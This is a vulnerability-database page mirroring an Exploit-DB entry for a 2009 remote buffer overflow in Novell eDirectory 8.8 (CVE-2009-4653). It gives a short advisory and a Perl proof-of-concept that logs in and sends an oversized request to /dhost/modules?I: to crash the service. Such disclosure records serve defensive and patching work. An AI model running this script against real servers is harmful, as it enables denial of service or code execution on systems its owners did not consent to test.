Lucene search
+L

Novell eDirectory 8.8 - '/dhost/modules?I:' Remote Buffer Overflow

🗓️ 12 Nov 2009 00:00:00Reported by HACKATTACKType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 20 Views

Novell eDirectory 8.8 buffer-overflow vulnerabilit

Related
Code
ReporterTitlePublishedViews
Family
Tenable Nessus
Novell eDirectory < 8.8 SP5 Patch 4 Multiple Vulnerabilities
15 Jun 201000:00
nessus
Tenable Nessus
Novell eDirectory < 8.8 SP5 Patch 4 Multiple Vulnerabilities
15 Jun 201000:00
nessus
Circl
CVE-2009-4653
12 Nov 200900:00
circl
CVE
CVE-2009-4653
26 Feb 201018:09
cve
Cvelist
CVE-2009-4653
26 Feb 201018:09
cvelist
EUVD
EUVD-2009-4618
7 Oct 202500:30
euvd
NVD
CVE-2009-4653
26 Feb 201018:30
nvd
OpenVAS
Novell eDirectory <= 8.8 SP5 Buffer Overflow Vulnerability
13 Nov 200900:00
openvas
OpenVAS
Novell eDirectory Multiple Vulnerabilities (Jun 2010)
4 Jun 201000:00
openvas
Prion
Stack overflow
26 Feb 201018:30
prion
Rows per page
source: https://www.securityfocus.com/bid/37009/info

Novell eDirectory is prone to a buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied data.

Attackers can exploit this issue to execute arbitrary code in the context of the affected application. Failed exploit attempts will likely cause denial-of-service conditions.

Novell eDirectory 8.8 SP5 is vulnerable; other versions may also be affected.

#!usr\bin\perl
#Vulnerability has found by HACKATTACK

use WWW::Mechanize;

use LWP::Debug qw(+);

use HTTP::Cookies;

$address=$ARGV[0];


if(!$ARGV[0]){

        print "Usage:perl $0 address\n";

exit();
}



$login = "$address/_LOGIN_SERVER_";

$url = "$address/dhost/";

$module = "modules?I:";

$buffer = "A" x 2000;


$vuln = $module.$buffer;

#Edit the username and password.

          $user = "username";

          $pass = "password";

#Edit the username and password.

my $mechanize = WWW::Mechanize->new();


$mechanize->cookie_jar(HTTP::Cookies->new(file => "$cookie_file",autosave => 1));


$mechanize->timeout($url_timeout);

$res = $mechanize->request(HTTP::Request->new('GET', "$login"));


    $mechanize->submit_form(

                  form_name => "authenticator",

                  fields    => {

                     usr => $user,

                     pwd => $pass},

                     button => 'Login');

$response2 = $mechanize->get("$url$vuln");

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

14 May 2014 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 29
EPSS0.12655
20